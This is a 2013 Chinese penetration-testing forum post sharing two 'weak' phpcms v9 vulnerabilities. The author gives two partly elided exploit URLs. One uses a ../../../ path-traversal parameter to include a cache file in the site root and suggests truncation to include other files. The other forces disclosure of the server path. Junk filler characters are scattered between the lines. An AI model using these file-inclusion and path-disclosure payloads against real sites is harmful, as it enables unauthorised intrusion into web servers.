中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
) R& b ~5 V$ o
2 X$ k& u: v9 t8 q6 a2 t$ s
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
" m# i" |7 A$ i' `6 |1 C
& u& W$ D0 q' w& A+ S, W
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
2 v- m' I9 n( ~6 `* z) |
1 W% |* m; ?3 S4 v
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
) o* {: s( f% ~& [. e. |
& v5 p- M. {6 D C$ _% x' z( L8 ~
#暴路径
U/ c( _+ I9 @$ P5 C& [
$ {+ X7 L2 }) q1 n4 X
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
' z: }& b/ M7 o* y& A- B9 G$ G
. K6 ]2 X# t* G' M5 _
) x6 o) R0 n2 j
) T+ M8 W- `- F; @
+1
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2